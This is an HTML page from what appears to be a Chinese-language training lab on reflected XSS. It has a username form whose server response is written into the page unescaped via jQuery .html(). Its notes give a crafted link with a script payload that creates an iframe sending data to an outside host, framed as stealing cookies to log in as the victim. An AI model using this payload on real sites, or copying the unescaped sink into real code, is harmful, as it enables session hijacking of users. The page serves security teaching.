<html>
<head>
<title>Learn From Mistakes.反射型XSS</title>
<script src="/static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.min.js"></script>
<script src="/static/js/jquery.nouislider.js"></script>
<link rel="stylesheet" type="text/css" href="/static/css/common.css" />
<link rel="stylesheet" type="text/css" href="/static/css/slide.css" />
<link rel="stylesheet" type="text/css"
	href="/static/css/bootstrap.min.css" />
<link rel="stylesheet" type="text/css"
	href="/static/css/flat-ui.min.css" />
<link rel="stylesheet" type="text/css"
	href="/static/css/jquery.nouislider.css" />
</head>
<body>
	<div>
		<ol>
			<li>输入用户名称</li>
			<li>点提交时将用户名发送到后台，后台校验用户，不合法抛异常或者返回信息。</li>
			<li>输入的文本内容被当成脚本执行</li>
		</ol>
	</div>
	<div>
		<form role="form">
			<div class="form-group">
				<label for="name">用户名称</label> <input type="text"
					class="form-control" id="name" placeholder="请输入名称" />
			</div>
			<input type="button" class="btn btn-primary" value="提交"
				onclick="checkUserExists()" />
		</form>
	</div>
	<div class="modal fade" id="myModal" tabindex="-1" role="dialog"
		aria-labelledby="myModalLabel" aria-hidden="true">
		<div class="modal-dialog">
			<div class="modal-content">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal"
						aria-hidden="true">×</button>
					<h4 class="modal-title" id="myModalLabel">信息</h4>
				</div>
				<div class="modal-body" id="alertdlg"></div>
				<div class="modal-footer">
					<button type="button" class="btn btn-primary" data-dismiss="modal">关闭</button>
				</div>
			</div>
			<!-- /.modal-content -->
		</div>
		<!-- /.modal-dialog -->
	</div>
	<div>
		1.确定网站可以被XSS攻击以后有啥用。如果说有些网站只需要cookie就可以登录网站呢？
		2.演示一下只通过cookie就可以登录睿治平台。
		3.构造一个URL，将当前网站的cookie发到其它地址上去.
			<ol>
			<li>(1)已知一个网站有XSS漏洞，其地址为http://localhost:9000/syr/rxss/checkparam?username=xxx</li>
			<li>(2)通过构造username参数生成一个获取cookie的脚本</li>
			<li>(3)诱导(FireFox)用户点击链接http://localhost:9000/syr/rxss/checkparam?username=&lt;script&gt;document.body.appendChild(document.createElement("iframe")).src="http://www.baidu.com?cookie="%2Bnavigator.appName&lt;/script&gt;
			<li>(4)获取用户的COOKIE，用EditThisCookie实现登录。</li>
			</ol>
	</div>
	<script>
		function checkUserExists() {
			var username = $("#name").val();
			$.post("/syr/rxss/checkparam", {
				"username" : username
			}, function(result) {
				$('#myModal').modal('show');
				$("#alertdlg").html(result);
			});
		}
	</script>
	<script>
		$(function() {
			$('#myModal').modal('hide')
		});
	</script>
</body>
</html>